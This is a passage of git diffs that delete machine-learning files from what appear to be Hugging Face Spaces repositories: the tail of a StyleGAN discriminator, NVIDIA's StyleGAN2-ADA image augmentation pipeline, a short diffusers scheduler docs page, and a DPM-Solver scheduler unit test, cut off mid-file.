self.block_resolutions: - block = getattr(self, f'b{res}') - x, img = block(x, img, **block_kwargs) - - cmap = None - if self.c_dim > 0: - cmap = self.mapping(None, c) - x = self.b4(x, img, cmap) - return x - - def extra_repr(self): - return f'c_dim={self.c_dim:d}, img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d}' - -# ---------------------------------------------------------------------------- diff --git a/spaces/Amrrs/DragGan-Inversion/training/augment.py b/spaces/Amrrs/DragGan-Inversion/training/augment.py deleted file mode 100644 index 8067f4e3fec058c9025edaa7a9a0442afe859ae5..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/training/augment.py +++ /dev/null @@ -1,562 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Augmentation pipeline from the paper -"Training Generative Adversarial Networks with Limited Data". -Matches the original implementation by Karras et al. at -https://github.com/NVlabs/stylegan2-ada/blob/main/training/augment.py""" - -import numpy as np -import scipy.signal -import torch -from torch_utils import persistence -from torch_utils import misc -from torch_utils.ops import upfirdn2d -from torch_utils.ops import grid_sample_gradfix -from torch_utils.ops import conv2d_gradfix - -# ---------------------------------------------------------------------------- -# Coefficients of various wavelet decomposition low-pass filters. - -wavelets = { - 'haar': [0.7071067811865476, 0.7071067811865476], - 'db1': [0.7071067811865476, 0.7071067811865476], - 'db2': [-0.12940952255092145, 0.22414386804185735, 0.836516303737469, 0.48296291314469025], - 'db3': [0.035226291882100656, -0.08544127388224149, -0.13501102001039084, 0.4598775021193313, 0.8068915093133388, 0.3326705529509569], - 'db4': [-0.010597401784997278, 0.032883011666982945, 0.030841381835986965, -0.18703481171888114, -0.02798376941698385, 0.6308807679295904, 0.7148465705525415, 0.23037781330885523], - 'db5': [0.003335725285001549, -0.012580751999015526, -0.006241490213011705, 0.07757149384006515, -0.03224486958502952, -0.24229488706619015, 0.13842814590110342, 0.7243085284385744, 0.6038292697974729, 0.160102397974125], - 'db6': [-0.00107730108499558, 0.004777257511010651, 0.0005538422009938016, -0.031582039318031156, 0.02752286553001629, 0.09750160558707936, -0.12976686756709563, -0.22626469396516913, 0.3152503517092432, 0.7511339080215775, 0.4946238903983854, 0.11154074335008017], - 'db7': [0.0003537138000010399, -0.0018016407039998328, 0.00042957797300470274, 0.012550998556013784, -0.01657454163101562, -0.03802993693503463, 0.0806126091510659, 0.07130921926705004, -0.22403618499416572, -0.14390600392910627, 0.4697822874053586, 0.7291320908465551, 0.39653931948230575, 0.07785205408506236], - 'db8': [-0.00011747678400228192, 0.0006754494059985568, -0.0003917403729959771, -0.00487035299301066, 0.008746094047015655, 0.013981027917015516, -0.04408825393106472, -0.01736930100202211, 0.128747426620186, 0.00047248457399797254, -0.2840155429624281, -0.015829105256023893, 0.5853546836548691, 0.6756307362980128, 0.3128715909144659, 0.05441584224308161], - 'sym2': [-0.12940952255092145, 0.22414386804185735, 0.836516303737469, 0.48296291314469025], - 'sym3': [0.035226291882100656, -0.08544127388224149, -0.13501102001039084, 0.4598775021193313, 0.8068915093133388, 0.3326705529509569], - 'sym4': [-0.07576571478927333, -0.02963552764599851, 0.49761866763201545, 0.8037387518059161, 0.29785779560527736, -0.09921954357684722, -0.012603967262037833, 0.0322231006040427], - 'sym5': [0.027333068345077982, 0.029519490925774643, -0.039134249302383094, 0.1993975339773936, 0.7234076904024206, 0.6339789634582119, 0.01660210576452232, -0.17532808990845047, -0.021101834024758855, 0.019538882735286728], - 'sym6': [0.015404109327027373, 0.0034907120842174702, -0.11799011114819057, -0.048311742585633, 0.4910559419267466, 0.787641141030194, 0.3379294217276218, -0.07263752278646252, -0.021060292512300564, 0.04472490177066578, 0.0017677118642428036, -0.007800708325034148], - 'sym7': [0.002681814568257878, -0.0010473848886829163, -0.01263630340325193, 0.03051551316596357, 0.0678926935013727, -0.049552834937127255, 0.017441255086855827, 0.5361019170917628, 0.767764317003164, 0.2886296317515146, -0.14004724044296152, -0.10780823770381774, 0.004010244871533663, 0.010268176708511255], - 'sym8': [-0.0033824159510061256, -0.0005421323317911481, 0.03169508781149298, 0.007607487324917605, -0.1432942383508097, -0.061273359067658524, 0.4813596512583722, 0.7771857517005235, 0.3644418948353314, -0.05194583810770904, -0.027219029917056003, 0.049137179673607506, 0.003808752013890615, -0.01495225833704823, -0.0003029205147213668, 0.0018899503327594609], -} - -# ---------------------------------------------------------------------------- -# Helpers for constructing transformation matrices. - - -def matrix(*rows, device=None): - assert all(len(row) == len(rows[0]) for row in rows) - elems = [x for row in rows for x in row] - ref = [x for x in elems if isinstance(x, torch.Tensor)] - if len(ref) == 0: - return misc.constant(np.asarray(rows), device=device) - assert device is None or device == ref[0].device - elems = [x if isinstance(x, torch.Tensor) else misc.constant( - x, shape=ref[0].shape, device=ref[0].device) for x in elems] - return torch.stack(elems, dim=-1).reshape(ref[0].shape + (len(rows), -1)) - - -def translate2d(tx, ty, **kwargs): - return matrix( - [1, 0, tx], - [0, 1, ty], - [0, 0, 1], - **kwargs) - - -def translate3d(tx, ty, tz, **kwargs): - return matrix( - [1, 0, 0, tx], - [0, 1, 0, ty], - [0, 0, 1, tz], - [0, 0, 0, 1], - **kwargs) - - -def scale2d(sx, sy, **kwargs): - return matrix( - [sx, 0, 0], - [0, sy, 0], - [0, 0, 1], - **kwargs) - - -def scale3d(sx, sy, sz, **kwargs): - return matrix( - [sx, 0, 0, 0], - [0, sy, 0, 0], - [0, 0, sz, 0], - [0, 0, 0, 1], - **kwargs) - - -def rotate2d(theta, **kwargs): - return matrix( - [torch.cos(theta), torch.sin(-theta), 0], - [torch.sin(theta), torch.cos(theta), 0], - [0, 0, 1], - **kwargs) - - -def rotate3d(v, theta, **kwargs): - vx = v[..., 0] - vy = v[..., 1] - vz = v[..., 2] - s = torch.sin(theta) - c = torch.cos(theta) - cc = 1 - c - return matrix( - [vx*vx*cc+c, vx*vy*cc-vz*s, vx*vz*cc+vy*s, 0], - [vy*vx*cc+vz*s, vy*vy*cc+c, vy*vz*cc-vx*s, 0], - [vz*vx*cc-vy*s, vz*vy*cc+vx*s, vz*vz*cc+c, 0], - [0, 0, 0, 1], - **kwargs) - - -def translate2d_inv(tx, ty, **kwargs): - return translate2d(-tx, -ty, **kwargs) - - -def scale2d_inv(sx, sy, **kwargs): - return scale2d(1 / sx, 1 / sy, **kwargs) - - -def rotate2d_inv(theta, **kwargs): - return rotate2d(-theta, **kwargs) - -# ---------------------------------------------------------------------------- -# Versatile image augmentation pipeline from the paper -# "Training Generative Adversarial Networks with Limited Data". -# -# All augmentations are disabled by default; individual augmentations can -# be enabled by setting their probability multipliers to 1. - - -@persistence.persistent_class -class AugmentPipe(torch.nn.Module): - def __init__(self, - xflip=0, rotate90=0, xint=0, xint_max=0.125, - scale=0, rotate=0, aniso=0, xfrac=0, scale_std=0.2, rotate_max=1, aniso_std=0.2, xfrac_std=0.125, - brightness=0, contrast=0, lumaflip=0, hue=0, saturation=0, brightness_std=0.2, contrast_std=0.5, hue_max=1, saturation_std=1, - imgfilter=0, imgfilter_bands=[1, 1, 1, 1], imgfilter_std=1, - noise=0, cutout=0, noise_std=0.1, cutout_size=0.5, - ): - super().__init__() - # Overall multiplier for augmentation probability. - self.register_buffer('p', torch.ones([])) - - # Pixel blitting. - # Probability multiplier for x-flip. - self.xflip = float(xflip) - # Probability multiplier for 90 degree rotations. - self.rotate90 = float(rotate90) - # Probability multiplier for integer translation. - self.xint = float(xint) - # Range of integer translation, relative to image dimensions. - self.xint_max = float(xint_max) - - # General geometric transformations. - # Probability multiplier for isotropic scaling. - self.scale = float(scale) - # Probability multiplier for arbitrary rotation. - self.rotate = float(rotate) - # Probability multiplier for anisotropic scaling. - self.aniso = float(aniso) - # Probability multiplier for fractional translation. - self.xfrac = float(xfrac) - # Log2 standard deviation of isotropic scaling. - self.scale_std = float(scale_std) - # Range of arbitrary rotation, 1 = full circle. - self.rotate_max = float(rotate_max) - # Log2 standard deviation of anisotropic scaling. - self.aniso_std = float(aniso_std) - # Standard deviation of frational translation, relative to image dimensions. - self.xfrac_std = float(xfrac_std) - - # Color transformations. - # Probability multiplier for brightness. - self.brightness = float(brightness) - # Probability multiplier for contrast. - self.contrast = float(contrast) - # Probability multiplier for luma flip. - self.lumaflip = float(lumaflip) - # Probability multiplier for hue rotation. - self.hue = float(hue) - # Probability multiplier for saturation. - self.saturation = float(saturation) - # Standard deviation of brightness. - self.brightness_std = float(brightness_std) - # Log2 standard deviation of contrast. - self.contrast_std = float(contrast_std) - # Range of hue rotation, 1 = full circle. - self.hue_max = float(hue_max) - # Log2 standard deviation of saturation. - self.saturation_std = float(saturation_std) - - # Image-space filtering. - # Probability multiplier for image-space filtering. - self.imgfilter = float(imgfilter) - # Probability multipliers for individual frequency bands. - self.imgfilter_bands = list(imgfilter_bands) - # Log2 standard deviation of image-space filter amplification. - self.imgfilter_std = float(imgfilter_std) - - # Image-space corruptions. - # Probability multiplier for additive RGB noise. - self.noise = float(noise) - # Probability multiplier for cutout. - self.cutout = float(cutout) - # Standard deviation of additive RGB noise. - self.noise_std = float(noise_std) - # Size of the cutout rectangle, relative to image dimensions. - self.cutout_size = float(cutout_size) - - # Setup orthogonal lowpass filter for geometric augmentations. - self.register_buffer( - 'Hz_geom', upfirdn2d.setup_filter(wavelets['sym6'])) - - # Construct filter bank for image-space filtering. - Hz_lo = np.asarray(wavelets['sym2']) # H(z) - Hz_hi = Hz_lo * ((-1) ** np.arange(Hz_lo.size)) # H(-z) - Hz_lo2 = np.convolve(Hz_lo, Hz_lo[::-1]) / 2 # H(z) * H(z^-1) / 2 - Hz_hi2 = np.convolve(Hz_hi, Hz_hi[::-1]) / 2 # H(-z) * H(-z^-1) / 2 - Hz_fbank = np.eye(4, 1) # Bandpass(H(z), b_i) - for i in range(1, Hz_fbank.shape[0]): - Hz_fbank = np.dstack([Hz_fbank, np.zeros_like(Hz_fbank)]).reshape( - Hz_fbank.shape[0], -1)[:, :-1] - Hz_fbank = scipy.signal.convolve(Hz_fbank, [Hz_lo2]) - Hz_fbank[i, (Hz_fbank.shape[1] - Hz_hi2.size) // - 2: (Hz_fbank.shape[1] + Hz_hi2.size) // 2] += Hz_hi2 - self.register_buffer('Hz_fbank', torch.as_tensor( - Hz_fbank, dtype=torch.float32)) - - def forward(self, images, debug_percentile=None): - assert isinstance(images, torch.Tensor) and images.ndim == 4 - batch_size, num_channels, height, width = images.shape - device = images.device - if debug_percentile is not None: - debug_percentile = torch.as_tensor( - debug_percentile, dtype=torch.float32, device=device) - - # ------------------------------------- - # Select parameters for pixel blitting. - # ------------------------------------- - - # Initialize inverse homogeneous 2D transform: G_inv @ pixel_out ==> pixel_in - I_3 = torch.eye(3, device=device) - G_inv = I_3 - - # Apply x-flip with probability (xflip * strength). - if self.xflip > 0: - i = torch.floor(torch.rand([batch_size], device=device) * 2) - i = torch.where(torch.rand( - [batch_size], device=device) < self.xflip * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 2)) - G_inv = G_inv @ scale2d_inv(1 - 2 * i, 1) - - # Apply 90 degree rotations with probability (rotate90 * strength). - if self.rotate90 > 0: - i = torch.floor(torch.rand([batch_size], device=device) * 4) - i = torch.where(torch.rand( - [batch_size], device=device) < self.rotate90 * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 4)) - G_inv = G_inv @ rotate2d_inv(-np.pi / 2 * i) - - # Apply integer translation with probability (xint * strength). - if self.xint > 0: - t = (torch.rand([batch_size, 2], device=device) - * 2 - 1) * self.xint_max - t = torch.where(torch.rand( - [batch_size, 1], device=device) < self.xint * self.p, t, torch.zeros_like(t)) - if debug_percentile is not None: - t = torch.full_like( - t, (debug_percentile * 2 - 1) * self.xint_max) - G_inv = G_inv @ translate2d_inv(torch.round( - t[:, 0] * width), torch.round(t[:, 1] * height)) - - # -------------------------------------------------------- - # Select parameters for general geometric transformations. - # -------------------------------------------------------- - - # Apply isotropic scaling with probability (scale * strength). - if self.scale > 0: - s = torch.exp2(torch.randn( - [batch_size], device=device) * self.scale_std) - s = torch.where(torch.rand( - [batch_size], device=device) < self.scale * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.scale_std)) - G_inv = G_inv @ scale2d_inv(s, s) - - # Apply pre-rotation with probability p_rot. - # P(pre OR post) = p - p_rot = 1 - torch.sqrt((1 - self.rotate * self.p).clamp(0, 1)) - if self.rotate > 0: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.rotate_max - theta = torch.where(torch.rand( - [batch_size], device=device) < p_rot, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.full_like( - theta, (debug_percentile * 2 - 1) * np.pi * self.rotate_max) - G_inv = G_inv @ rotate2d_inv(-theta) # Before anisotropic scaling. - - # Apply anisotropic scaling with probability (aniso * strength). - if self.aniso > 0: - s = torch.exp2(torch.randn( - [batch_size], device=device) * self.aniso_std) - s = torch.where(torch.rand( - [batch_size], device=device) < self.aniso * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.aniso_std)) - G_inv = G_inv @ scale2d_inv(s, 1 / s) - - # Apply post-rotation with probability p_rot. - if self.rotate > 0: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.rotate_max - theta = torch.where(torch.rand( - [batch_size], device=device) < p_rot, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.zeros_like(theta) - G_inv = G_inv @ rotate2d_inv(-theta) # After anisotropic scaling. - - # Apply fractional translation with probability (xfrac * strength). - if self.xfrac > 0: - t = torch.randn([batch_size, 2], device=device) * self.xfrac_std - t = torch.where(torch.rand( - [batch_size, 1], device=device) < self.xfrac * self.p, t, torch.zeros_like(t)) - if debug_percentile is not None: - t = torch.full_like(t, torch.erfinv( - debug_percentile * 2 - 1) * self.xfrac_std) - G_inv = G_inv @ translate2d_inv(t[:, 0] * width, t[:, 1] * height) - - # ---------------------------------- - # Execute geometric transformations. - # ---------------------------------- - - # Execute if the transform is not identity. - if G_inv is not I_3: - - # Calculate padding. - cx = (width - 1) / 2 - cy = (height - 1) / 2 - cp = matrix([-cx, -cy, 1], [cx, -cy, 1], [cx, cy, 1], - [-cx, cy, 1], device=device) # [idx, xyz] - cp = G_inv @ cp.t() # [batch, xyz, idx] - Hz_pad = self.Hz_geom.shape[0] // 4 - margin = cp[:, :2, :].permute( - 1, 0, 2).flatten(1) # [xy, batch * idx] - # [x0, y0, x1, y1] - margin = torch.cat([-margin, margin]).max(dim=1).values - margin = margin + \ - misc.constant([Hz_pad * 2 - cx, Hz_pad * 2 - cy] - * 2, device=device) - margin = margin.max(misc.constant([0, 0] * 2, device=device)) - margin = margin.min(misc.constant( - [width-1, height-1] * 2, device=device)) - mx0, my0, mx1, my1 = margin.ceil().to(torch.int32) - - # Pad image and adjust origin. - images = torch.nn.functional.pad( - input=images, pad=[mx0, mx1, my0, my1], mode='reflect') - G_inv = translate2d((mx0 - mx1) / 2, (my0 - my1) / 2) @ G_inv - - # Upsample. - images = upfirdn2d.upsample2d(x=images, f=self.Hz_geom, up=2) - G_inv = scale2d( - 2, 2, device=device) @ G_inv @ scale2d_inv(2, 2, device=device) - G_inv = translate2d(-0.5, -0.5, - device=device) @ G_inv @ translate2d_inv(-0.5, -0.5, device=device) - - # Execute transformation. - shape = [batch_size, num_channels, - (height + Hz_pad * 2) * 2, (width + Hz_pad * 2) * 2] - G_inv = scale2d(2 / images.shape[3], 2 / images.shape[2], device=device) @ G_inv @ scale2d_inv( - 2 / shape[3], 2 / shape[2], device=device) - grid = torch.nn.functional.affine_grid( - theta=G_inv[:, :2, :], size=shape, align_corners=False) - images = grid_sample_gradfix.grid_sample(images, grid) - - # Downsample and crop. - images = upfirdn2d.downsample2d( - x=images, f=self.Hz_geom, down=2, padding=-Hz_pad*2, flip_filter=True) - - # -------------------------------------------- - # Select parameters for color transformations. - # -------------------------------------------- - - # Initialize homogeneous 3D transformation matrix: C @ color_in ==> color_out - I_4 = torch.eye(4, device=device) - C = I_4 - - # Apply brightness with probability (brightness * strength). - if self.brightness > 0: - b = torch.randn([batch_size], device=device) * self.brightness_std - b = torch.where(torch.rand( - [batch_size], device=device) < self.brightness * self.p, b, torch.zeros_like(b)) - if debug_percentile is not None: - b = torch.full_like(b, torch.erfinv( - debug_percentile * 2 - 1) * self.brightness_std) - C = translate3d(b, b, b) @ C - - # Apply contrast with probability (contrast * strength). - if self.contrast > 0: - c = torch.exp2(torch.randn( - [batch_size], device=device) * self.contrast_std) - c = torch.where(torch.rand( - [batch_size], device=device) < self.contrast * self.p, c, torch.ones_like(c)) - if debug_percentile is not None: - c = torch.full_like(c, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.contrast_std)) - C = scale3d(c, c, c) @ C - - # Apply luma flip with probability (lumaflip * strength). - # Luma axis. - v = misc.constant(np.asarray([1, 1, 1, 0]) / np.sqrt(3), device=device) - if self.lumaflip > 0: - i = torch.floor(torch.rand([batch_size, 1, 1], device=device) * 2) - i = torch.where(torch.rand( - [batch_size, 1, 1], device=device) < self.lumaflip * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 2)) - C = (I_4 - 2 * v.ger(v) * i) @ C # Householder reflection. - - # Apply hue rotation with probability (hue * strength). - if self.hue > 0 and num_channels > 1: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.hue_max - theta = torch.where(torch.rand( - [batch_size], device=device) < self.hue * self.p, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.full_like( - theta, (debug_percentile * 2 - 1) * np.pi * self.hue_max) - C = rotate3d(v, theta) @ C # Rotate around v. - - # Apply saturation with probability (saturation * strength). - if self.saturation > 0 and num_channels > 1: - s = torch.exp2(torch.randn( - [batch_size, 1, 1], device=device) * self.saturation_std) - s = torch.where(torch.rand( - [batch_size, 1, 1], device=device) < self.saturation * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.saturation_std)) - C = (v.ger(v) + (I_4 - v.ger(v)) * s) @ C - - # ------------------------------ - # Execute color transformations. - # ------------------------------ - - # Execute if the transform is not identity. - if C is not I_4: - images = images.reshape([batch_size, num_channels, height * width]) - if num_channels == 3: - images = C[:, :3, :3] @ images + C[:, :3, 3:] - elif num_channels == 1: - C = C[:, :3, :].mean(dim=1, keepdims=True) - images = images * \ - C[:, :, :3].sum(dim=2, keepdims=True) + C[:, :, 3:] - else: - raise ValueError( - 'Image must be RGB (3 channels) or L (1 channel)') - images = images.reshape([batch_size, num_channels, height, width]) - - # ---------------------- - # Image-space filtering. - # ---------------------- - - if self.imgfilter > 0: - num_bands = self.Hz_fbank.shape[0] - assert len(self.imgfilter_bands) == num_bands - # Expected power spectrum (1/f). - expected_power = misc.constant( - np.array([10, 1, 1, 1]) / 13, device=device) - - # Apply amplification for each band with probability (imgfilter * strength * band_strength). - # Global gain vector (identity). - g = torch.ones([batch_size, num_bands], device=device) - for i, band_strength in enumerate(self.imgfilter_bands): - t_i = torch.exp2(torch.randn( - [batch_size], device=device) * self.imgfilter_std) - t_i = torch.where(torch.rand( - [batch_size], device=device) < self.imgfilter * self.p * band_strength, t_i, torch.ones_like(t_i)) - if debug_percentile is not None: - t_i = torch.full_like(t_i, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.imgfilter_std)) if band_strength > 0 else torch.ones_like(t_i) - # Temporary gain vector. - t = torch.ones([batch_size, num_bands], device=device) - # Replace i'th element. - t[:, i] = t_i - # Normalize power. - t = t / (expected_power * t.square() - ).sum(dim=-1, keepdims=True).sqrt() - # Accumulate into global gain. - g = g * t - - # Construct combined amplification filter. - # [batch, tap] - Hz_prime = g @ self.Hz_fbank - Hz_prime = Hz_prime.unsqueeze(1).repeat( - [1, num_channels, 1]) # [batch, channels, tap] - # [batch * channels, 1, tap] - Hz_prime = Hz_prime.reshape([batch_size * num_channels, 1, -1]) - - # Apply filter. - p = self.Hz_fbank.shape[1] // 2 - images = images.reshape( - [1, batch_size * num_channels, height, width]) - images = torch.nn.functional.pad( - input=images, pad=[p, p, p, p], mode='reflect') - images = conv2d_gradfix.conv2d( - input=images, weight=Hz_prime.unsqueeze(2), groups=batch_size*num_channels) - images = conv2d_gradfix.conv2d( - input=images, weight=Hz_prime.unsqueeze(3), groups=batch_size*num_channels) - images = images.reshape([batch_size, num_channels, height, width]) - - # ------------------------ - # Image-space corruptions. - # ------------------------ - - # Apply additive RGB noise with probability (noise * strength). - if self.noise > 0: - sigma = torch.randn([batch_size, 1, 1, 1], - device=device).abs() * self.noise_std - sigma = torch.where(torch.rand( - [batch_size, 1, 1, 1], device=device) < self.noise * self.p, sigma, torch.zeros_like(sigma)) - if debug_percentile is not None: - sigma = torch.full_like(sigma, torch.erfinv( - debug_percentile) * self.noise_std) - images = images + \ - torch.randn([batch_size, num_channels, height, - width], device=device) * sigma - - # Apply cutout with probability (cutout * strength). - if self.cutout > 0: - size = torch.full([batch_size, 2, 1, 1, 1], - self.cutout_size, device=device) - size = torch.where(torch.rand( - [batch_size, 1, 1, 1, 1], device=device) < self.cutout * self.p, size, torch.zeros_like(size)) - center = torch.rand([batch_size, 2, 1, 1, 1], device=device) - if debug_percentile is not None: - size = torch.full_like(size, self.cutout_size) - center = torch.full_like(center, debug_percentile) - coord_x = torch.arange(width, device=device).reshape([1, 1, 1, -1]) - coord_y = torch.arange( - height, device=device).reshape([1, 1, -1, 1]) - mask_x = (((coord_x + 0.5) / width - - center[:, 0]).abs() >= size[:, 0] / 2) - mask_y = (((coord_y + 0.5) / height - - center[:, 1]).abs() >= size[:, 1] / 2) - mask = torch.logical_or(mask_x, mask_y).to(torch.float32) - images = images * mask - - return images - -# ---------------------------------------------------------------------------- diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md deleted file mode 100644 index 0ed145119fd2b513a4a1e33af894ae1c0f71df49..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md +++ /dev/null @@ -1,20 +0,0 @@ - - -# VQDiffusionScheduler - -## Overview - -Original paper can be found [here](https://arxiv.org/abs/2111.14822) - -## VQDiffusionScheduler -[[autodoc]] VQDiffusionScheduler \ No newline at end of file diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py deleted file mode 100644 index c9935780b9830f44cfd4d2e2ba76c2282baeab53..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py +++ /dev/null @@ -1,273 +0,0 @@ -import tempfile - -import torch - -from diffusers import ( - DEISMultistepScheduler, - DPMSolverMultistepScheduler, - DPMSolverSinglestepScheduler, - UniPCMultistepScheduler, -) - -from .test_schedulers import SchedulerCommonTest - - -class DPMSolverMultistepSchedulerTest(SchedulerCommonTest): - scheduler_classes = (DPMSolverMultistepScheduler,) - forward_default_kwargs = (("num_inference_steps", 25),) - - def get_scheduler_config(self, **kwargs): - config = { - "num_train_timesteps": 1000, - "beta_start": 0.0001, - "beta_end": 0.02, - "beta_schedule": "linear", - "solver_order": 2, - "prediction_type": "epsilon", - "thresholding": False, - "sample_max_value": 1.0, - "algorithm_type": "dpmsolver++", - "solver_type": "midpoint", - "lower_order_final": False, - "lambda_min_clipped": -float("inf"), - "variance_type": None, - } - - config.update(**kwargs) - return config - - def check_over_configs(self, time_step=0, **config): - kwargs = dict(self.forward_default_kwargs) - num_inference_steps = kwargs.pop("num_inference_steps", None) - sample = self.dummy_sample - residual = 0.1 * sample - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - scheduler.set_timesteps(num_inference_steps) - # copy over dummy past residuals - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - with tempfile.TemporaryDirectory() as tmpdirname: - scheduler.save_config(tmpdirname) - new_scheduler = scheduler_class.from_pretrained(tmpdirname) - new_scheduler.set_timesteps(num_inference_steps) - # copy over dummy past residuals - new_scheduler.model_outputs = dummy_past_residuals[: new_scheduler.config.solver_order] - - output, new_output = sample, sample - for t in range(time_step, time_step + scheduler.config.solver_order + 1): - output = scheduler.step(residual, t, output, **kwargs).prev_sample - new_output = new_scheduler.step(residual, t, new_output, **kwargs).prev_sample - - assert torch.sum(torch.abs(output - new_output)) < 1e-5, "Scheduler outputs are not identical" - - def test_from_save_pretrained(self): - pass - - def check_over_forward(self, time_step=0, **forward_kwargs): - kwargs = dict(self.forward_default_kwargs) - num_inference_steps = kwargs.pop("num_inference_steps", None) - sample = self.dummy_sample - residual = 0.1 * sample - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config() - scheduler = scheduler_class(**scheduler_config) - scheduler.set_timesteps(num_inference_steps) - - # copy over dummy past residuals (must be after setting timesteps) - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - with tempfile.TemporaryDirectory() as tmpdirname: - scheduler.save_config(tmpdirname) - new_scheduler = scheduler_class.from_pretrained(tmpdirname) - # copy over dummy past residuals - new_scheduler.set_timesteps(num_inference_steps) - - # copy over dummy past residual (must be after setting timesteps) - new_scheduler.model_outputs = dummy_past_residuals[: new_scheduler.config.solver_order] - - output = scheduler.step(residual, time_step, sample, **kwargs).prev_sample - new_output = new_scheduler.step(residual, time_step, sample, **kwargs).prev_sample - - assert torch.sum(torch.abs(output - new_output)) < 1e-5, "Scheduler outputs are not identical" - - def full_loop(self, scheduler=None, **config): - if scheduler is None: - scheduler_class = self.scheduler_classes[0] - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - - num_inference_steps = 10 - model = self.dummy_model() - sample = self.dummy_sample_deter - scheduler.set_timesteps(num_inference_steps) - - for i, t in enumerate(scheduler.timesteps): - residual = model(sample, t) - sample = scheduler.step(residual, t, sample).prev_sample - - return sample - - def test_step_shape(self): - kwargs = dict(self.forward_default_kwargs) - - num_inference_steps = kwargs.pop("num_inference_steps", None) - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config() - scheduler = scheduler_class(**scheduler_config) - - sample = self.dummy_sample - residual = 0.1 * sample - - if num_inference_steps is not None and hasattr(scheduler, "set_timesteps"): - scheduler.set_timesteps(num_inference_steps) - elif num_inference_steps is not None and not hasattr(scheduler, "set_timesteps"): - kwargs["num_inference_steps"] = num_inference_steps - - # copy over dummy past residuals (must be done after set_timesteps) - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - time_step_0 = scheduler.timesteps[5] - time_step_1 = scheduler.timesteps[6] - - output_0 = scheduler.step(residual, time_step_0, sample, **kwargs).prev_sample - output_1 = scheduler.step(residual, time_step_1, sample, **kwargs).prev_sample - - self.assertEqual(output_0.shape, sample.shape) - self.assertEqual(output_0.shape, output_1.shape) - - def test_timesteps(self): - for timesteps in [25, 50, 100, 999, 1000]: - self.check_over_configs(num_train_timesteps=timesteps) - - def test_thresholding(self): - self.check_over_configs(thresholding=False) - for order in [1, 2, 3]: - for solver_type in ["midpoint", "heun"]: - for threshold in [0.5, 1.0, 2.0]: - for prediction_type in ["epsilon", "sample"]: - self.check_over_configs( - thresholding=True, - prediction_type=prediction_type, - sample_max_value=threshold, - algorithm_type="dpmsolver++", - solver_order=order, - solver_type=solver_type, - ) - - def test_prediction_type(self): - for prediction_type in ["epsilon", "v_prediction"]: - self.check_over_configs(prediction_type=prediction_type) - - def test_solver_order_and_type(self): - for algorithm_type in ["dpmsolver", "dpmsolver++", "sde-dpmsolver", "sde-dpmsolver++"]: - for solver_type in ["midpoint", "heun"]: - for order in [1, 2, 3]: - for prediction_type in ["epsilon", "sample"]: - if algorithm_type in ["sde-dpmsolver", "sde-dpmsolver++"]: - if order == 3: - continue - else: - self.check_over_configs( - solver_order=order, - solver_type=solver_type, - prediction_type=prediction_type, - algorithm_type=algorithm_type, - ) - sample = self.full_loop( - solver_order=order, - solver_type=solver_type, - prediction_type=prediction_type, - algorithm_type=algorithm_type, - ) - assert not torch.isnan(sample).any(), "Samples have nan numbers" - - def test_lower_order_final(self): - self.check_over_configs(lower_order_final=True) - self.check_over_configs(lower_order_final=False) - - def test_lambda_min_clipped(self): - self.check_over_configs(lambda_min_clipped=-float("inf")) - self.check_over_configs(lambda_min_clipped=-5.1) - - def test_variance_type(self): - self.check_over_configs(variance_type=None) - self.check_over_configs(variance_type="learned_range") - - def test_inference_steps(self): - for num_inference_steps in [1, 2, 3, 5, 10, 50, 100, 999, 1000]: - self.check_over_forward(num_inference_steps=num_inference_steps, time_step=0) - - def 